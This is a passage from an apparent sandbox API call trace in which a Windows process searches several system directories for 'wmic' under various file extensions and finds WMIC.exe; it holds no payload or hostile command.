nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.864] SetErrorMode (uMode=0x1) returned 0x1 [0257.864] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.BAT", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.864] SetErrorMode (uMode=0x1) returned 0x1 [0257.864] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.864] SetErrorMode (uMode=0x1) returned 0x1 [0257.864] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.CMD", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.864] SetErrorMode (uMode=0x1) returned 0x1 [0257.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.865] SetErrorMode (uMode=0x1) returned 0x1 [0257.865] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBS", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.865] SetErrorMode (uMode=0x1) returned 0x1 [0257.865] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.865] SetErrorMode (uMode=0x1) returned 0x1 [0257.865] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.VBE", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.866] SetErrorMode (uMode=0x1) returned 0x1 [0257.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.866] SetErrorMode (uMode=0x1) returned 0x1 [0257.866] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JS", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.866] SetErrorMode (uMode=0x1) returned 0x1 [0257.866] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.867] SetErrorMode (uMode=0x1) returned 0x1 [0257.867] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.JSE", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.867] SetErrorMode (uMode=0x1) returned 0x1 [0257.867] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.867] SetErrorMode (uMode=0x1) returned 0x1 [0257.867] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSF", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.867] SetErrorMode (uMode=0x1) returned 0x1 [0257.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.868] SetErrorMode (uMode=0x1) returned 0x1 [0257.868] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.WSH", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.868] SetErrorMode (uMode=0x1) returned 0x1 [0257.868] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.868] SetErrorMode (uMode=0x1) returned 0x1 [0257.868] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic.MSC", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.869] SetErrorMode (uMode=0x1) returned 0x1 [0257.869] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0257.869] SetErrorMode (uMode=0x1) returned 0x1 [0257.869] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\wmic", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.869] SetErrorMode (uMode=0x1) returned 0x1 [0257.869] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.870] SetErrorMode (uMode=0x1) returned 0x1 [0257.870] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.ps1", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.870] SetErrorMode (uMode=0x1) returned 0x1 [0257.870] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.870] SetErrorMode (uMode=0x1) returned 0x1 [0257.870] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psm1", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.870] SetErrorMode (uMode=0x1) returned 0x1 [0257.871] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.871] SetErrorMode (uMode=0x1) returned 0x1 [0257.871] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.psd1", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.871] SetErrorMode (uMode=0x1) returned 0x1 [0257.871] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.871] SetErrorMode (uMode=0x1) returned 0x1 [0257.871] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.COM", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.872] SetErrorMode (uMode=0x1) returned 0x1 [0257.872] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.872] SetErrorMode (uMode=0x1) returned 0x1 [0257.872] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.EXE", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.872] SetErrorMode (uMode=0x1) returned 0x1 [0257.873] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.873] SetErrorMode (uMode=0x1) returned 0x1 [0257.873] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.BAT", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.873] SetErrorMode (uMode=0x1) returned 0x1 [0257.873] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.873] SetErrorMode (uMode=0x1) returned 0x1 [0257.873] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.CMD", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.874] SetErrorMode (uMode=0x1) returned 0x1 [0257.874] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.874] SetErrorMode (uMode=0x1) returned 0x1 [0257.874] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBS", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.874] SetErrorMode (uMode=0x1) returned 0x1 [0257.874] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.875] SetErrorMode (uMode=0x1) returned 0x1 [0257.875] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.VBE", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.875] SetErrorMode (uMode=0x1) returned 0x1 [0257.875] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.875] SetErrorMode (uMode=0x1) returned 0x1 [0257.875] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JS", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.875] SetErrorMode (uMode=0x1) returned 0x1 [0257.875] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.876] SetErrorMode (uMode=0x1) returned 0x1 [0257.876] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.JSE", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.876] SetErrorMode (uMode=0x1) returned 0x1 [0257.876] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.876] SetErrorMode (uMode=0x1) returned 0x1 [0257.876] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSF", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.877] SetErrorMode (uMode=0x1) returned 0x1 [0257.877] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.877] SetErrorMode (uMode=0x1) returned 0x1 [0257.877] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.WSH", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.877] SetErrorMode (uMode=0x1) returned 0x1 [0257.877] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.877] SetErrorMode (uMode=0x1) returned 0x1 [0257.877] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic.MSC", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.878] SetErrorMode (uMode=0x1) returned 0x1 [0257.878] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa [0257.878] SetErrorMode (uMode=0x1) returned 0x1 [0257.878] FindFirstFileW (in: lpFileName="C:\\Windows\\wmic", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.878] SetErrorMode (uMode=0x1) returned 0x1 [0257.878] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0257.878] SetErrorMode (uMode=0x1) returned 0x1 [0257.879] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.ps1", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.879] SetErrorMode (uMode=0x1) returned 0x1 [0257.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0257.879] SetErrorMode (uMode=0x1) returned 0x1 [0257.879] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psm1", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.879] SetErrorMode (uMode=0x1) returned 0x1 [0257.879] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0257.880] SetErrorMode (uMode=0x1) returned 0x1 [0257.880] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.psd1", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.880] SetErrorMode (uMode=0x1) returned 0x1 [0257.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0257.880] SetErrorMode (uMode=0x1) returned 0x1 [0257.880] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.COM", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0257.880] SetErrorMode (uMode=0x1) returned 0x1 [0257.880] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem", nBufferLength=0x105, lpBuffer=0x1c8ed0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0257.881] SetErrorMode (uMode=0x1) returned 0x1 [0257.881] FindFirstFileW (in: lpFileName="C:\\Windows\\System32\\Wbem\\wmic.EXE", lpFindFileData=0x1c8ed280 | out: lpFindFileData=0x1c8ed280*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x1ff0a0 [0257.881] FindNextFileW (in: hFindFile=0x1ff0a0, lpFindFileData=0x1c8ed290 | out: lpFindFileData=0x1c8ed290*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5694022d, ftCreationTime.dwHighDateTime=0x1ca0414, ftLastAccessTime.dwLowDateTime=0x5694022d, ftLastAccessTime.dwHighDateTime=0x1ca0414, ftLastWriteTime.dwLowDateTime=0xfd50fc30, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x8a400, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0 [0257.881] FindClose (in: hFindFile=0x1ff0a0 | out: hFindFile=0x1ff0a0) returned 1 [0257.881] SetErrorMode (uMode=0x1) returned 0x1 [0257.881] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe", nBufferLength=0x105, lpBuffer=0x1c8ed3a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\Wbem\\WMIC.exe", lpFilePart=0x0) returned 0x21 [0257.881] SetErrorMode (uMode=0x1) returned 0x1 [0257.882] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe"), fInfoLevelId=0x0, lpFileInformation=0x1c8ed5b0 | 